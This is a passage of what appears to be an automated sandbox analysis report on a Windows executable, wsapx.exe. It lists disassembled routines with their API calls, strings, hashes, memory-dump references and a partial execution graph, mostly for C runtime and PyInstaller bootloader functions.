                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00619EB2908B8582EB20AF25F4403AAB7A4FBC5BA4F444625EF9C03B55CF7CD195CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                • Instruction ID: 8bad83fd77456f50d4f3da069cbbc2363f3e3353a36a0c3803c1607745fba7b1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A51D3B290824287EB64AF25E084768B7A8FB94FA4F944135EE4C43BD5CF3CE552C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF7C71B352C,?,00000000,00007FF7C71B3F23), ref: 00007FF7C71B7F22
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                • Instruction ID: a680becc744ef84d055fc3f8fae95bd78d6e72bb96fe345c70c495ba6aad656d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0631B671719AC146EA21AF21B4517AAA364EFC4FF4F841231EE6D477C9DE3CE6068710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                • Instruction ID: aa86f1ea5dde1402545276de8a72f20fc2fdc1a5200d271e25c32b4b22ae7f82
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7121B172B18B4182E721AF54F4857AAA3A4EBC8B94F804131EE8D93655DF3CD24AC750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                • Instruction ID: 3aab948ca4d1a9e257958ae2f900f2c4ce8a77f9a8670dd7eb98b303ac255d78
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25D12772B18A408BE711DFA9E4401AC7771FB94FA8B848235DE5E57B89DE38D407C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                • Instruction ID: f0f180b177008c89fbe897a43bbf8e0c92963cfc214eed1589d3289e0cb8adaa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01512973F081118BFB14EFA4A9957BCA7A9AB90B78F904135ED1D52AE4DF38A503C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                • Instruction ID: 173772bec6df521791b11e27a7a1971f633386cf7eccb5fbabc1a03cd5548fa8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D516222E086418BFB10EFB1E4503BDABB1AB88FA8F644575DE4D57689DF38D542C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction ID: e79bda630bed4a44c07d468e4c644bff8772ac87388b32baf1dfbe61957b0a38
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB11A971B1C14243F655AF69F9882B99291EBD9FA0FC4C030DF4A07B99CD2DD5968610
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                • Instruction ID: 2a4553ba099a8aec5c5db6e110ca966514bc3a210b5364d9cf161b10ffb011ff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B412B12A1868147F722AF65B481379E664EBE0FF4F944235EE5C06AD5DE3CD442CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C90B6
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C71BCC15), ref: 00007FF7C71C90D4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                                • API String ID: 3580290477-3302721598
                                                                                                                                                                                                                                                • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                • Instruction ID: 17458fd6defc6d2548aebf330592781d0acd47de8e01809fc26c857e4711c2b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB414031A0865287E715FF65B8810BDA794EB84FE4BD54035EA4E43B85DE3CE4938360
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                • Instruction ID: a2e211a56e73fee2a883212f16d36f7c676aa409a19189427c2e43a6ffa515af
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F41A772B18A4586DB209F65F4443B9A761FBD4BA4F844035EE4D87B98DF3CD502CB50
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                                • Instruction ID: 5fb5493a09cc253c9a3302ad274e7611088f32cc27f6fc463b717bc04ae42c2e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1421CE63A0829183EB20AF55E04426DB3B5FBC8F94FD58035DA8D43694DF7CEA46CB61
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                • Instruction ID: 999e80c2de1e550b40157e95cc51e93f567e9002ce35832dfb1a1cba2b8f026e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92112B32618B8183EB619F15F440269B7E4FB88F94F994234DE8D07B69EF3CD5528B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                • Instruction ID: ba3a1ff7511b0b4414d425eb6ff46139613af58c264950ad48d73016b97ccb97
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1701882291C20787F721BF50B4A627EA7A0EFD4B64FC00035D55D46695DF2CD5068E34

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:3.4%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:1.2%
                                                                                                                                                                                                                                                Total number of Nodes:811
                                                                                                                                                                                                                                                Total number of Limit Nodes:49
                                                                                                                                                                                                                                                execution_graph 51569 7ff7c71bbb50 51570 7ff7c71bbb7e 51569->51570 51571 7ff7c71bbb65 51569->51571 51571->51570 51574 7ff7c71cd66c 51571->51574 51575 7ff7c71cd6b7 51574->51575 51579 7ff7c71cd67b _set_fmode 51574->51579 51582 7ff7c71c4f78 11 API calls _set_fmode 51575->51582 51576 7ff7c71cd69e HeapAlloc 51578 7ff7c71bbbde 51576->51578 51576->51579 51579->51575 51579->51576 51581 7ff7c71d3600 EnterCriticalSection LeaveCriticalSection _set_fmode 51579->51581 51581->51579 51582->51578 51583 7ff7c71b2fe0 51584 7ff7c71b2ff0 51583->51584 51585 7ff7c71b3041 51584->51585 51586 7ff7c71b302b 51584->51586 51588 7ff7c71b3061 51585->51588 51599 7ff7c71b3077 __std_exception_destroy 51585->51599 51645 7ff7c71b2710 54 API calls _log10_special 51586->51645 51646 7ff7c71b2710 54 API calls _log10_special 51588->51646 51592 7ff7c71b3037 __std_exception_destroy 51647 7ff7c71bc5c0 51592->51647 51594 7ff7c71b3349 51662 7ff7c71b2710 54 API calls _log10_special 51594->51662 51597 7ff7c71b3333 51661 7ff7c71b2710 54 API calls _log10_special 51597->51661 51599->51592 51599->51594 51599->51597 51600 7ff7c71b330d 51599->51600 51602 7ff7c71b3207 51599->51602 51611 7ff7c71b1470 51599->51611 51641 7ff7c71b1c80 51599->51641 51660 7ff7c71b2710 54 API calls _log10_special 51600->51660 51603 7ff7c71b3273 51602->51603 51656 7ff7c71ca474 37 API calls 2 library calls 51602->51656 51605 7ff7c71b3290 51603->51605 51606 7ff7c71b329e 51603->51606 51657 7ff7c71ca474 37 API calls 2 library calls 51605->51657 51658 7ff7c71b2dd0 37 API calls 51606->51658 51609 7ff7c71b329c 51659 7ff7c71b2500 54 API calls __std_exception_destroy 51609->51659 51663 7ff7c71b45b0 51611->51663 51614 7ff7c71b149b 51703 7ff7c71b2710 54 API calls _log10_special 51614->51703 51615 7ff7c71b14bc 51673 7ff7c71c0744 51615->51673 51618 7ff7c71b14ab 51618->51599 51619 7ff7c71b14d1 51620 7ff7c71b14d5 51619->51620 51621 7ff7c71b14f8 51619->51621 51704 7ff7c71c4f78 11 API calls _set_fmode 51620->51704 51625 7ff7c71b1532 51621->51625 51626 7ff7c71b1508 51621->51626 51623 7ff7c71b14da 51705 7ff7c71b2910 54 API calls _log10_special 51623->51705 51627 7ff7c71b1538 51625->51627 51628 7ff7c71b154b 51625->51628 51706 7ff7c71c4f78 11 API calls _set_fmode 51626->51706 51677 7ff7c71b1210 51627->51677 51629 7ff7c71b14f3 __std_exception_destroy 51628->51629 51637 7ff7c71b15d6 51628->51637 51708 7ff7c71c040c 51628->51708 51699 7ff7c71c00bc 51629->51699 51631 7ff7c71b1510 51707 7ff7c71b2910 54 API calls _log10_special 51631->51707 51635 7ff7c71b15c4 51635->51599 51711 7ff7c71c4f78 11 API calls 